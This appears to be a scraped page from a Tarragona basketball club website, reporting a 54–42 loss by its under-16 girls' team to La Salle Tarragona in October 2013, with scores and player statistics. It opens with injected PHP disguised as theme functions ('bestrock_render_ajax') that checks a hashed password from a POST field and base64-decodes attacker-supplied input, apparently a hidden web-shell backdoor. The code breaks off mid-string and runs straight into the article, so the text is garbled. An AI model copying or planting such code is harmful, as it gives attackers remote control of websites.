function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El primer quart condemna el cadet femení A - Tgn Bàsquet Club -

El primer quart condemna el cadet femení A

Updated: octubre 7, 2013

El TGN Bàsquet va encaixar la segona derrota de la temporada després de perdre a la pista de la Salle Tarragona en un partit que es va mig decidir en el primer quart. Les locals van sortir molt fortes, amb una defensa pressionant a tota la pista que, inicialment, les visitants van poder trencar amb una certa facilitat però les errades en posicions clares de tir van provocar el desordre amb què l’equip havia començat i les locals se’n van aprofitar. La Salle va recuperar moltes pilotes prop de la cistella contrària i va obrir una diferència al resultat que mai va poder ser eixugada.

Les liles van corregir algunes errades en el segon període però la punteria no s’afinava i tot i igualar una mica el matx, no van poder retallar diferències. Després del descans, les locals van fer variants defensives, deixant la pressió a tota la pista i provant coses en atac, fet que va donar un respir al TGN Bàsquet que, però, encara era lluny del seu adversari.

En els últims deu minuts l’atac visitant per fi millora però aleshores el rebot va ser el seu taló d’Aquiles. La Salle va aprofitar les segones i terceres opcions de tir per endur-se el triomf.

AB LA SALLE TARRAGONA – NEMSER TGN BASQUET A   54-42
AB LA SALLE TARRAGONA. Campabadal 7, Domenech 1, Gonzalez 2, Clua 7, Martiniello 8, Ferrus 1, Alsina 11, Ventura 2, Loras 13, Garcia 2. Tirs Lliures 8/26. Faltes 19

TGN BÀSQUET: Maria M., Judit P. 4; Barreira 2, Gisela B., Farre 4, Tibau A. 15, Arfelis A., Anton S. 4,Gulli 9, Ruiz 2, Bazan M. 2, Güell J. Tirs lliures 8/22 , Faltes 23.

Parcials:  17-6 / 10-8 (27-14 descans) / 9-8 / 18-20